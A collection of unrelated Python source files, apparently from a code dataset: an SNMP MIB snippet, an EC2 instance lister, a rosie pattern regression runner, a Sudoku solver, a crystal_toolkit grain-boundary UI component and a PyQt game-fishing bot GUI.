Counter64, Integer32, NotificationType, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Gauge32, IpAddress, MibIdentifier, NotificationType, ModuleIdentity, ObjectIdentity, Bits, TimeTicks, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Integer32", "NotificationType", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Gauge32", "IpAddress", "MibIdentifier", "NotificationType", "ModuleIdentity", "ObjectIdentity", "Bits", "TimeTicks", "Counter32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# The remoteLoginStatus notification: OID 1.3.6.1.4.1.45.1.6.2.8.0.1,
# reporting the remote login IP and status objects.
remoteLoginStatus = NotificationType((1, 3, 6, 1, 4, 1, 45, 1, 6, 2, 8) + (0,1)).setObjects(("S5-AGENT-MIB", "s5AgRemoteLoginIp"), ("S5-AGENT-MIB", "s5AgRemoteLoginStatus"))
mibBuilder.exportSymbols("REMOTE-LOGIN-TRAP-MIB", remoteLoginStatus=remoteLoginStatus)
| 2,035 | 756 |
import boto.ec2
import config

# Script: print a fixed-width table of every EC2 instance in the
# configured region (id, IPs, Name tag, subnet, state).

# Region comes from the project-level config helper.
region = config.get("aws_region")
conn = boto.ec2.connect_to_region(region)
reservations = conn.get_all_instances()

fields = ("id", "public ip", "private ip", "name", "subnet", "state")
format_str = "{:<20} {:<16} {:<16} {:<16} {:<16} {:<12}"
print(format_str.format(*fields))
sep = ('-'*12,) * 6
print(format_str.format(*sep))

for res in reservations:
    for inst in res.instances:
        # Use local fallbacks instead of mutating the boto instance
        # objects (the original assigned '<none>' back onto the
        # instance's attributes as a side effect).
        name = inst.tags.get('Name', '<none>')
        public_ip = '<none>' if inst.ip_address is None else inst.ip_address
        private_ip = '<none>' if inst.private_ip_address is None else inst.private_ip_address
        subnet = "<none>" if inst.subnet_id is None else inst.subnet_id
        print(format_str.format(inst.id, public_ip, private_ip, name, subnet, inst.state))
| 877 | 313 |
'''
Created on Feb 8, 2017
This is the regression script the langlib project.
It is meant to be run at the top level directory of the repository.
'''
import copy,json
from os import walk
from os.path import exists,splitext
from subprocess import Popen, PIPE
from string import digits
import difflib
import sys
#This is the location of the testfiles and manifest relative to the root directory.
testfiles = "./testfiles/"
manifest_file = "./MANIFEST"
#This dict defines the translation from directory names in the "testfiles" directory to actual rosie pattern
#i.e. csharp -> "cs.<pattern>"
langs = {
"java" : "java",
"c" : "c",
"cpp" : "cpp",
"csharp" : "cs",
"go" : "go",
"javascript" : "js",
"ruby" : "rb",
"r" : "r",
"bash" : "b",
"vb" : "vb",
"python" : "py",
}
#This array defines the actuals expected to be ran by the script. These are also the expected directory names
#for associated tests under the testfiles/language i.e. each "comments" -> "./testfiles/<language>/comments/
tests = [
"comments",
"dependencies",
"functions",
"classes",
"structs",
"strings"
]
class HtmlPrinter:
    '''
    A small report writer: collects the HTML diff tables produced during a
    test run and emits them, each under a heading, into one result file.
    '''
    def __init__(self, id):
        '''
        Open the report file for this execution.
        id : Numeric id of the test execution (test id).
        '''
        self.ts = id
        path = "./result" + str(self.ts) + ".html"
        self.file = open(path, 'w')
    def add_table(self, test, html):
        '''Append one section: an <h1> title for *test*, then the table markup.'''
        heading = "<h1>" + test + "</h1>"
        for chunk in (heading, html):
            self.file.write(chunk)
    def close(self):
        '''Close the report file, flushing any pending writes.'''
        self.file.close()
def run_tests():
    '''
    This function iterates through all directories found under ./testfiles/ and executes tests if possible.
    The process is as follows:
    1. Find directory in ./testfiles/, and verify if it maps to a value in the langs.
    Continue to step 2 if it does not or move to new directory.
    2. Find a directory in the langs directory found in step 1, and verify if it maps to a test in the tests array.
    Continue to step 3 if it does not or move to a new directory.
    3. Find a file in the test directory found in step 2.
    If the file is correctly named i.e <pattern name><numeric id>.<valid_extension> then strip the numeric id,
    keeping the pattern name.
    4. Verify that the input file has a corresponding json output file in ./testfiles/<lang>/output/<test>/.
    If it does continue to step 5 otherwise move to a new test file.
    5. Execute the input file and compare the results to the output file. Fail the test if a difference is found,
    and print the diff using HTMLPrinter.
    6. Move to new test file as appropriate and continue.
    '''
    failures = 0
    testCount = 0
    # The single command-line argument is the numeric test-run id used to
    # name the HTML report file.
    printer = HtmlPrinter(sys.argv[1])
    for test in tests:
        for lang,alias in langs.items():
            base_path = testfiles + lang + "/input/" + test + "/"
            for (dirpath, dirnames, test_files) in walk(base_path):
                for test_file in test_files:
                    resolved_input = dirpath + test_file
                    # Expected output lives at the mirrored path under
                    # .../output/..., with a .json extension.
                    resolved_output = splitext(resolved_input)[0].replace("input","output") + ".json"
                    if not exists(resolved_input): continue
                    if not exists(resolved_output): continue
                    # NOTE(review): the 'rU' mode is a Python-2 universal-
                    # newlines flag (removed in Python 3.11).
                    with open(resolved_output, 'rU') as vOut:
                        test_file_name = splitext(test_file)[0]
                        pattern = copy.copy(test_file_name)
                        # Strip the trailing numeric id to recover the pattern
                        # name. NOTE(review): str.translate(None, digits) is the
                        # Python-2 signature; under Python 3 this raises
                        # TypeError -- this script appears to target Python 2.
                        pattern = pattern.translate(None,digits)
                        # Run rosie against the input file, capturing the JSON
                        # match output on stdout.
                        proc = Popen('rosie -manifest ' + manifest_file + ' -wholefile -encode json ' + alias + "." + pattern + " " + resolved_input, stdout=PIPE, stderr=PIPE,shell=True)
                        stdout = ''
                        stderr = ''
                        # NOTE(review): on Python 3 these pipes yield bytes, not
                        # str -- another sign this targets Python 2.
                        for line in proc.stdout: stdout += line
                        for line in proc.stderr: stderr += line
                        if(stderr != ''): print(stderr)
                        try:
                            # Normalise both JSON documents (sorted keys, fixed
                            # indent) so the comparison ignores formatting.
                            json1 = json.loads(vOut.read())
                            json2 = json.loads(stdout)
                            jsonOut1 = json.dumps(json1,indent=2, sort_keys=True)
                            jsonOut2 = json.dumps(json2,indent=2, sort_keys=True)
                            if jsonOut1 != jsonOut2:
                                # Mismatch: record a side-by-side HTML diff.
                                differ = difflib.HtmlDiff()
                                printer.add_table(lang + " : " + test_file_name, ''.join(differ.make_file(jsonOut1.splitlines(True),jsonOut2.splitlines(True))))
                                failures += 1
                                print("-------------------------------------------------")
                                print (test_file_name + " test failed for " + lang)
                        except ValueError:
                            # Unparseable JSON (from either side) counts as a
                            # failure too.
                            failures += 1
                            print("-------------------------------------------------")
                            print (test_file_name + " test failed for " + lang)
                    testCount += 1
    print("-------------------------------------------------")
    if(testCount == 1):
        print(str(testCount) + " test ran")
    else:
        print(str(testCount) + " tests ran")
    if(failures == 1):
        print(str(failures) + " test failed")
    else:
        print(str(failures) + " tests failed")
    print("-------------------------------------------------")
    printer.close()
    # Non-zero exit code signals failure to the calling CI job.
    if(failures > 0): exit(1)
# Script entry point: run the regression suite when executed directly.
if __name__ == '__main__':
    run_tests()
| 5,795 | 1,572 |
# Class https://docs.python.org/3/tutorial/classes.html
class SudokuSolver:
    """Sudoku solver combining constraint propagation with depth-first search.

    boxes    : list of the 81 cell names (e.g. 'A1' ... 'I9').
    unitlist : list of all units (rows, columns, 3x3 squares), each unit
               being a list of 9 box names.
    """
    def __init__(self, boxes, unitlist):
        self.boxes = boxes
        self.unitlist = unitlist
    # My solution
    def set_boxes_values(self, values):
        """Map each box name to the corresponding character of *values*.

        Bug fix: the original definition was missing ``self``, so the method
        could not be called on an instance and ``self.boxes`` was an unbound
        name.
        """
        board = {}
        for index in range(len(self.boxes)):
            board[self.boxes[index]] = values[index]
        return board
    # Better solution
    def grid_values(self, values):
        """Return {box: char} for an 81-character grid string."""
        assert len(values) == 81, "Input grid must be a string of length 81 (9x9)"
        return dict(zip(self.boxes, values))
    # The elimination technique https://youtu.be/6rFOX2jHB2g
    # Adding grid values with the elimination technique so unknown cells
    # carry every candidate digit.
    def grid_all_posibilities(self, values):
        """Like grid_values, but unknown cells ('.') map to '123456789'."""
        assert len(values) == 81, "Input grid must be a string of length 81 (9x9)"
        board = {}
        for index in range(len(self.boxes)):
            value = values[index]
            if value == ".":
                board[self.boxes[index]] = "123456789"
            else:
                board[self.boxes[index]] = value
        return board
    # Udacity solution
    def another_grid_all_posibilities(self, values):
        """Equivalent to grid_all_posibilities, built by appending to a list.

        Bug fix: the original was missing ``self``, immediately clobbered its
        *values* argument with an empty list, and then iterated over an
        undefined name ``grid`` -- it could never run.
        """
        cells = []
        all_digits = '123456789'
        for c in values:
            if c == '.':
                cells.append(all_digits)
            elif c in all_digits:
                cells.append(c)
        assert len(cells) == 81
        return dict(zip(self.boxes, cells))
    # Find boxes holding a single digit and remove that digit from all peers.
    def __eliminate(self, values):
        """Elimination strategy: prune solved digits from peer candidates."""
        units = dict((s, [u for u in self.unitlist if s in u]) for s in self.boxes)
        peers = dict((s, set(sum(units[s],[]))-set([s])) for s in self.boxes)
        solved_values = [box for box in values.keys() if len(values[box]) == 1]
        for box in solved_values:
            digit = values[box]
            for peer in peers[box]:
                values[peer] = values[peer].replace(digit, '')
        return values
    # Only choice technique: https://youtu.be/sSjYn-Kex1A
    def __only_choise(self, values):
        """If a unit has exactly one box that can hold a digit, assign it."""
        for unit in self.unitlist:
            for digit in '123456789':
                dplaces = [box for box in unit if digit in values[box]]
                if len(dplaces) == 1:
                    values[dplaces[0]] = digit
        return values
    # Constraint propagation loop.
    def reduce_puzzle(self, values):
        """Apply eliminate/only-choice until no further progress is made.

        Returns the (mutated) values dict, or False if any box ends up with
        zero candidates (a contradiction).
        """
        stalled = False
        while not stalled:
            # Count boxes with a determined value before applying strategies.
            solve_values_before = len([box for box in values.keys() if len(values[box]) == 1])
            self.__eliminate(values)
            self.__only_choise(values)
            # Count again to detect progress.
            solve_values_after = len([box for box in values.keys() if len(values[box]) == 1])
            # If no new values were added, stop the loop.
            stalled = solve_values_before == solve_values_after
            # Sanity check: a box with no remaining candidates means failure.
            if len([box for box in values.keys() if len(values[box]) == 0]):
                return False
        return values
    # search strategy https://youtu.be/omveZu2gRLs
    def search(self, values):
        """Depth-first search with constraint propagation.

        Returns the solved values dict, False on contradiction, or (implicitly)
        None when every branch of the chosen box fails -- callers treat both
        False and None as falsy.
        """
        # First, reduce the puzzle with constraint propagation.
        values = self.reduce_puzzle(values)
        if values is False:
            return False # Error propagation
        if all(len(values[s]) == 1 for s in self.boxes):
            return values # Solved
        # Choose one of the unfilled squares with the fewest possibilities.
        n, s = min((len(values[s]), s) for s in self.boxes if len(values[s]) > 1)
        # Recurse on each candidate; the first truthy result is the answer.
        for value in values[s]:
            new_sudoku = values.copy()
            new_sudoku[s] = value
            attempt = self.search(new_sudoku)
            if attempt:
                return attempt
    def display(self, values, rows, columns):
        """
        Display the values as a 2-D grid.
        Input: The sudoku in dictionary form
        Output: None
        """
        width = 1+max(len(values[s]) for s in self.boxes)
        line = '+'.join(['-'*(width*3)]*3)
        for r in rows:
            print(''.join(values[r+c].center(width)+('|' if c in '36' else '')
                          for c in columns))
            if r in 'CF': print(line)
        return
| 4,727 | 1,399 |
import dash
from dash import dcc
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.transformations.advanced_transformations import (
GrainBoundaryGenerator,
GrainBoundaryTransformation,
)
from crystal_toolkit.components.transformations.core import TransformationComponent
from crystal_toolkit.helpers.layouts import add_label_help
class GrainBoundaryTransformationComponent(TransformationComponent):
    """Dash UI component wrapping pymatgen's GrainBoundaryTransformation.

    Presents the transformation's keyword arguments as form inputs, and
    wires callbacks so that the sigma choices follow the rotation axis and
    the rotation-angle choices follow the chosen sigma.
    """

    @property
    def title(self):
        return "Make a grain boundary"

    @property
    def description(self):
        return """Create a grain boundary within a periodic supercell. This transformation
requires sensible inputs, and will be slow to run in certain cases.

When using this transformation a new site property is added which can be used
to colour-code the top and bottom grains."""

    @property
    def transformation(self):
        return GrainBoundaryTransformation

    def options_layouts(self, state=None, structure=None):
        """Build the form inputs for the transformation's kwargs.

        :param state: previously-entered kwarg values; defaults cover a
            simple twist boundary around [0, 0, 1].
        :param structure: input structure, used to enumerate sigma values.
        :return: list of Dash layout elements, one per option.
        """
        state = state or {
            "rotation_axis": [0, 0, 1],
            "rotation_angle": None,
            "expand_times": 2,
            "vacuum_thickness": 0,
            "ab_shift": [0, 0],
            "normal": False,
            "ratio": None,
            "plane": None,
            "max_search": 20,
            "tol_coi": 1e-8,
            "rm_ratio": 0.7,
            "quick_gen": False,
        }

        # Bug fix: the original help_str here was a copy-paste from an
        # unrelated "maximum number of atoms" option.
        rotation_axis = self.get_numerical_input(
            label="Rotation axis",
            kwarg_label="rotation_axis",
            state=state,
            help_str="""Axis about which the top grain is rotated, as integer lattice indices.""",
            shape=(3,),
        )

        # sigma isn't a direct input into the transformation, but has
        # to be calculated from the rotation_axis and structure
        _, sigma_options, _ = self._get_sigmas_options_and_ratio(
            structure, state.get("rotation_axis")
        )
        sigma = dcc.Dropdown(
            id=self.id("sigma"),
            style={"width": "5rem"},
            options=sigma_options,
            value=sigma_options[0]["value"] if sigma_options else None,
        )
        sigma = add_label_help(
            sigma,
            "Sigma",
            "The unit cell volume of the coincidence site lattice relative to "
            "input unit cell is denoted by sigma.",
        )

        # likewise, rotation_angle is then a function of sigma, so
        # best determined using sigma to provide a default value:
        # this is initialized via a callback
        rotation_angle = self.get_choice_input(
            label="Rotation angle",
            kwarg_label="rotation_angle",
            state=state,  # starts as None
            help_str="""Rotation angle to generate grain boundary. Options determined by
            your choice of Σ.""",
            style={"width": "15rem"},
        )

        expand_times = self.get_numerical_input(
            label="Expand times",
            kwarg_label="expand_times",
            state=state,
            help_str="""The multiple number of times to expand one unit grain into a larger grain. This is
            useful to avoid self-interaction issues when using the grain boundary as an input to further simulations.""",
            is_int=True,
            shape=(),
            min=1,
            max=6,
        )

        vacuum_thickness = self.get_numerical_input(
            label="Vacuum thickness /Å",
            kwarg_label="vacuum_thickness",
            state=state,
            help_str="""The thickness of vacuum that you want to insert between the two grains.""",
            shape=(),
        )

        ab_shift = self.get_numerical_input(
            label="In-plane shift",
            kwarg_label="ab_shift",
            state=state,
            help_str="""In-plane shift of the two grains given in units of the **a**
            and **b** vectors of the grain boundary.""",
            shape=(2,),
        )

        normal = self.get_bool_input(
            label="Set normal direction",
            kwarg_label="normal",
            state=state,
            help_str="Enable to require the **c** axis of the top grain to be perpendicular to the surface.",
        )

        plane = self.get_numerical_input(
            label="Grain boundary plane",
            kwarg_label="plane",
            state=state,
            help_str="""Grain boundary plane in the form of a list of integers.
            If not set, grain boundary will be a twist grain boundary.
            The plane will be perpendicular to the rotation axis.""",
            shape=(3,),
        )

        tol_coi = self.get_numerical_input(
            label="Coincidence Site Tolerance",
            kwarg_label="tol_coi",
            state=state,
            help_str="""Tolerance to find the coincidence sites. To check the number of coincidence
            sites are correct or not, you can compare the generated grain boundary's sigma with
            expected number.""",
            shape=(),
        )

        rm_ratio = self.get_numerical_input(
            label="Site Merging Tolerance",
            kwarg_label="rm_ratio",
            state=state,
            help_str="""The criteria to remove the atoms which are too close with each other relative to
            the bond length in the bulk system.""",
            shape=(),
        )

        return [
            rotation_axis,
            sigma,
            rotation_angle,
            expand_times,
            vacuum_thickness,
            ab_shift,
            normal,
            plane,
            tol_coi,
            rm_ratio,
        ]

    @staticmethod
    def _get_sigmas_options_and_ratio(structure, rotation_axis):
        """Enumerate allowed sigma values for a structure and rotation axis.

        :param structure: pymatgen Structure or None (cubic is assumed when
            no structure is given, just to seed initial choices).
        :param rotation_axis: rotation axis as a sequence of three numbers.
        :return: (sigmas dict mapping sigma -> rotation angles,
                  dropdown options list with unicode-subscript Σ labels,
                  lattice axial ratio or None).
        """
        rotation_axis = [int(i) for i in rotation_axis]

        # Assume cubic if no structure specified, just to set initial choices.
        lat_type = "c"
        ratio = None
        if structure:
            sga = SpacegroupAnalyzer(structure)
            lat_type = sga.get_lattice_type()[0]  # this should be fixed in pymatgen
            try:
                ratio = GrainBoundaryGenerator(structure).get_ratio()
            except Exception:
                ratio = None

        cutoff = 10
        # Dispatch on the lattice type's first letter; each pymatgen
        # enumerator takes the axial ratio in its own keyword.
        if lat_type.lower() == "c":
            sigmas = GrainBoundaryGenerator.enum_sigma_cubic(
                cutoff=cutoff, r_axis=rotation_axis
            )
        elif lat_type.lower() == "t":
            sigmas = GrainBoundaryGenerator.enum_sigma_tet(
                cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio
            )
        elif lat_type.lower() == "o":
            sigmas = GrainBoundaryGenerator.enum_sigma_ort(
                cutoff=cutoff, r_axis=rotation_axis, c2_b2_a2_ratio=ratio
            )
        elif lat_type.lower() == "h":
            sigmas = GrainBoundaryGenerator.enum_sigma_hex(
                cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio
            )
        elif lat_type.lower() == "r":
            sigmas = GrainBoundaryGenerator.enum_sigma_rho(
                cutoff=cutoff, r_axis=rotation_axis, ratio_alpha=ratio
            )
        else:
            return [], None, ratio

        options = []
        # Render sigma values with unicode subscripts, e.g. Σ5 -> Σ₅.
        subscript_unicode_map = {
            0: "₀",
            1: "₁",
            2: "₂",
            3: "₃",
            4: "₄",
            5: "₅",
            6: "₆",
            7: "₇",
            8: "₈",
            9: "₉",
        }
        for sigma in sorted(sigmas.keys()):
            sigma_label = "Σ{}".format(sigma)
            for k, v in subscript_unicode_map.items():
                sigma_label = sigma_label.replace(str(k), v)
            options.append({"label": sigma_label, "value": sigma})

        return sigmas, options, ratio

    def generate_callbacks(self, app, cache):
        """Register the Dash callbacks that keep sigma and rotation-angle
        dropdowns consistent with the rotation axis and structure."""
        super().generate_callbacks(app, cache)

        @app.callback(
            Output(self.id("sigma"), "options"),
            [Input(self.get_kwarg_id("rotation_axis"), "value")],
            [State(self.id("input_structure"), "data")],
        )
        def update_sigma_options(rotation_axis, structure):
            """Recompute the sigma choices when the rotation axis changes."""
            rotation_axis = self.reconstruct_kwarg_from_state(
                dash.callback_context.inputs, "rotation_axis"
            )
            if (rotation_axis is None) or (not structure):
                raise PreventUpdate
            structure = self.from_data(structure)
            _, sigma_options, _ = self._get_sigmas_options_and_ratio(
                structure=structure, rotation_axis=rotation_axis
            )
            # TODO: add some sort of error handling here when sigmas is empty
            return sigma_options

        @app.callback(
            Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), "options"),
            [
                Input(self.id("sigma"), "value"),
                Input(self.get_kwarg_id("rotation_axis"), "value"),
            ],
            [State(self.id("input_structure"), "data")],
        )
        def update_rotation_angle_options(sigma, rotation_axis, structure):
            """Offer the rotation angles compatible with the chosen sigma."""
            if not sigma:
                raise PreventUpdate
            rotation_axis = self.reconstruct_kwarg_from_state(
                dash.callback_context.inputs, "rotation_axis"
            )
            if (rotation_axis is None) or (not structure):
                raise PreventUpdate
            structure = self.from_data(structure)
            sigmas, _, _ = self._get_sigmas_options_and_ratio(
                structure=structure, rotation_axis=rotation_axis
            )
            rotation_angles = sigmas[sigma]
            options = []
            for rotation_angle in sorted(rotation_angles):
                options.append(
                    {"label": "{:.2f}º".format(rotation_angle), "value": rotation_angle}
                )
            return options

        # TODO: make client-side callback
        @app.callback(
            [Output(self.id("sigma"), "value"), Output(self.id("sigma"), "disabled")],
            [
                Input(self.id("sigma"), "options"),
                Input(self.id("enable_transformation"), "on"),
            ],
        )
        def update_default_sigma(options, enabled):
            """Select the first available sigma whenever options change."""
            if not options:
                raise PreventUpdate
            return options[0]["value"], enabled

        # TODO: make client-side callback, or just combine all callbacks here
        # Renamed from a second ``update_default_value`` definition, which
        # shadowed the function above in this scope (both callbacks were
        # still registered, but the duplicate name was confusing).
        @app.callback(
            Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), "value"),
            [
                Input(
                    self.id("rotation_angle", is_kwarg=True, hint="literal"), "options"
                )
            ],
        )
        def update_default_rotation_angle(options):
            """Select the first available rotation angle whenever options change."""
            if not options:
                raise PreventUpdate
            return options[0]["value"]
| 10,956 | 3,030 |
import imagesearch
import gui
import subprocess
import time
#from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import traceback,sys
class Thread(QThread):
    """Worker QThread running a supplied callable off the GUI thread.

    fn : the callable to execute in run().
    f  : when True, fn is treated as a class that takes the application
         window ``w`` and whose ``CheckArea()`` method is invoked;
         otherwise fn is called with no arguments.
    """

    # Bug fix: PyQt signals must be declared as class attributes so the
    # QThread metaclass can bind them. The original created pyqtSignal as
    # a throwaway local inside __init__, so instances had no usable
    # ``signal`` attribute (the commented-out
    # ``self.fish_thread.signal.connect`` calls elsewhere expect one).
    signal = pyqtSignal(object)

    def __init__(self, fn, f=False):
        super(Thread, self).__init__()
        self.f = f
        self.fn = fn

    # run method gets called when we start the thread
    def run(self):
        print("starting thread")
        if self.f:
            # NOTE(review): relies on the module-global window ``w`` being
            # created before this thread starts -- confirm the ordering.
            result = self.fn(w).CheckArea()
        else:
            result = self.fn()

    def stop(self):
        """Hard-stop the thread. terminate() is abrupt: the thread gets no
        opportunity to clean up."""
        print("thread ended")
        self.terminate()
class Timer:
    """Countdown helper driven from a worker thread.

    Ticks once per second, updating the GUI's elapsed-time field on the
    module-global window ``w``, until either ``duration`` minutes have
    passed or the GUI's "Stopped" label is set.
    """
    def __init__(self,duration):
        """duration: run length in minutes."""
        super(Timer, self).__init__()
        self.dur = duration
        # Elapsed time split into h/m/s for display, plus a total tick count.
        self.elapsed_s = 0
        self.elapsed_m = 0
        self.elapsed_h = 0
        self.total=0
    def timer(self):
        """Tick loop: runs until the duration expires or the user stops it,
        then marks the GUI stopped and resets it via w.Clear()."""
        # Loop while under the limit (dur minutes = dur*60 ticks) and the GUI
        # has not been flagged as stopped.
        while (self.total<=(self.dur*60)) and (w.gui.stoppedLabel.text()==""):
            if self.elapsed_m<=59:
                # NOTE(review): seconds increment to 60 before rolling over on
                # the following tick, so "0:0:60" is briefly displayed.
                if self.elapsed_s<=59:
                    self.elapsed_s+=1
                else:
                    self.elapsed_s=0
                    self.elapsed_m+=1
            else:
                # NOTE(review): on the hour rollover the seconds counter is
                # not reset -- presumably an oversight; confirm.
                self.elapsed_h+=1
                self.elapsed_m=0
            time_text=str(self.elapsed_h) + ":" + str(self.elapsed_m) + ":" + str(self.elapsed_s)
            w.gui.time_edit.setText(time_text)
            self.total+=1
            time.sleep(1)
        # Either the timer ran out or the user pressed stop: reflect that in
        # the GUI and reset the window state.
        w.gui.stoppedLabel.setText("Stopped")
        w.Clear()
class AppWindow(QMainWindow):
    """Main window for the fishing bot: wires the generated Qt UI to the
    image-search worker thread and a countdown timer."""
    def __init__(self):
        super(AppWindow, self).__init__()
        # Generated UI (from the gui module's Qt Designer output).
        self.gui = gui.Ui_Window()
        self.gui.setupUi(self)
        # Worker thread running the image-search bot (f=True means the
        # Thread wraps imagesearch.Fishit(w).CheckArea()).
        self.fish_thread = Thread(imagesearch.Fishit, f=True)
        self.gui.fish_button.clicked.connect(self.FishButton)
        #self.fish_thread.signal.connect(self.gui.status_label.setText)
        #self.fish_thread.signal.connect(self.finished)
        self.gui.stop_button.clicked.connect(self.Stop)
    def FishButton(self):
        """Start handler: launch the bot thread and a countdown timer for
        the duration selected in the dropdown (minutes)."""
        duration = int(self.gui.duration.currentText())
        self.gui.fish_button.setEnabled(False)
        # An empty stoppedLabel is the Timer's run condition.
        self.gui.stoppedLabel.setText("")
        self.fish_thread.start()
        self.timer = Thread(Timer(duration).timer)
        self.timer.start()
    def Stop(self):
        """Stop handler: flag the GUI stopped, kill the timer thread and
        reset the displayed fields."""
        self.gui.stoppedLabel.setText("Stopped")
        self.timer.stop()
        self.Clear()
        self.time=0
    def Clear(self):
        """Reset the time/status fields and re-enable the start button."""
        self.gui.time_edit.setText("0:0:0")
        self.gui.catched_edit.setText("")
        self.gui.status_edit.setText("")
        self.gui.fish_button.setEnabled(True)
# Application entry point: create the Qt application and main window, then
# hand control to the Qt event loop. ``w`` is the module-global window that
# Thread and Timer reference.
if __name__ == "__main__":
    app=QApplication(sys.argv)
    w=AppWindow()
    w.show()
    app.exec_()